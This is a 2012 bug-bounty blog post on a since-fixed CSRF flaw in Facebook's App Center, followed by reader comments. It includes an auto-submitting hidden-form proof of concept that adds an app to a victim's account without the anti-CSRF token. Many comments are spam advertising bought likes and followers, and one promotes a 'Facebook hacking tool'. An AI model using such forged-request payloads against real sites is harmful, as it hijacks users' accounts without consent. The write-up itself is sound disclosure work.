Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook I recently reported & now fixed. One fine day, when I logged into Facebook, I noticed a new feature "Appcenter". This feature allows you to choose apps you need. Game apps like Farmvilla are more popular.

I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked "Play Game" button, was generating a POST request.


POST /connect/uiserver.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800


There are many new parameters added in this new feature. Parameter 'fb_dtsg' is like token and 'perm' are the permissions required by the apps. Parameters 'redirect_url','app_id' are app specific values. Remaining parameters seems static except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and after few attempts, I knew that these params no longer needed to add an app. 

Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

Final PoC for this CSRF looks like this:

<body onload=document.forms[0].submit();>
<form action="" method="POST">
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value=1 />
        <input type="hidden" name="new_user_session" value=1 />
        <input type="hidden" name="grant_clicked" value=1 />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="" />
        <input type="hidden" name="app_center" value=1 />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value=1 />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <input type="hidden" name="grant_clicked" value="Play+Game" />

This functionality was used for other apps as well such as music apps, developers apps. Facebook Security team awarded this bug with $5000.

Facebook was pretty fast to address this issue and resolved this the next day itself. I'm very thankful to Facebook Security Team.


  1. Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

    Awesome Find mate !!

  2. Congrats buddy.You are awesome as usual. :)

  3. Congrats bro. Awesome finding. :)

  4. Guy, you're genius because you TRIED it. I always believe that FB/Twitter are not that stupid to skip token verification. but now HAHAHA

    P.S. i love csrf

  5. +1 on Egors post. I would have thought "nah, if they check that token on five scripts, they check it on every script" :D
    Nice find and enjoy your additional months salary ;)

    Did you try to find an exploit by hand or use an automatic tool?

  6. Thansk everyone.
    @Egor, I think it was my lucky time. Btw, your work on CSRF is gr8
    @archi, mostly do it manually with FF adsons

  7. I was stunned to see that in this new function, somehow designer skipped this factor and it was possible to add app without 'fb_dtsg'.


  8. Well done, really impressive

    Keep the good work up !

  9. wow, great, I was wondering how to cure acne naturally. and found your site by google, learned a lot, now i’m a bit clear. I’ve bookmark your site and also add rss. keep us updated.
    Buy Facebook Likes Cheap

  10. You have raised an important issue..Thanks for sharing..I would like to read more current affairs from this blog..keep posting..
    buy facebook likes cheap

  11. The content is great, and you’re an educated writer unlike most of the blogs.thanks for the post.
    courtney jones atlanta

  12. Wow, Excellent post. This article is really very interesting and effective. I think its must be helpful for us. Thanks for sharing your informative. Buy Facebook Likes

  13. hello blogger,i really appreciate your highly thought about this matter through your post.Obviously your post is very informative.If you update your Social account, please visit buy facebook likes
    For facebook Service.

  14. Greetings dear,many many thanks for sharing such wonderful information with us.I am eagerly waiting for your next post.Kindly please visit buy-twitter-followers
    site for social information.

  15. Amazing post dude.It will be very helpful for begginers like me.Thank you very much for this important post.Waiting for your next post.You can visit our site also

  16. Fantastic, I'm enjoyed read this post, Every time search this type of post. Really I enjoyed. This article is really very interesting and effective. I think its must be helpful for us. Thanks for sharing your informative. Buy Twitter Followers

  17. To buy facebook post likes is the paramount technique to drive your communication via facebook to heaps of natives and counting associates. Whenever you purchase likes to post updates, it is made certain that the genuine and dynamic users like the posts. With the squat charge of correspondence of the likes that are purchased for the facebook posts gives the boost to the matter that you have posted by people viewing it and liking it. This way you achieve fame because more and more traffic is generated.

  18. Thank you so much for caring about your content and your readers.
    buy social media fans

  19. Well Nice to see this post but unfortunately this method is not working anymore. You may check this now. Facebook Hacking tool 2016 100% Working

  20. Awesome things here. I'm very satisfied to look your article. Thank you so much and I'm having a look forward to contact you. Will you please drop me a e-mail?
    buy facebook likes